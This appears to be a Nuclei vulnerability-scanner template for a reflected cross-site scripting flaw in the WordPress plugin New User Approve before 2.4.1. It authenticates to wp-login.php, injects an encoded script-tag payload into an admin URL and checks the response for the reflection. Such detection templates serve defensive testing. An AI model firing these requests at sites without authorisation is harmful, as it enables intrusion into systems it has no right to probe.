id: new-user-approve-xss info: name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting author: Akincibor severity: medium description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a - https://wordpress.org/plugins/new-user-approve metadata: verified: true tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '?a">&new-user-approve-settings' - type: word part: header words: - text/html - type: status status: - 200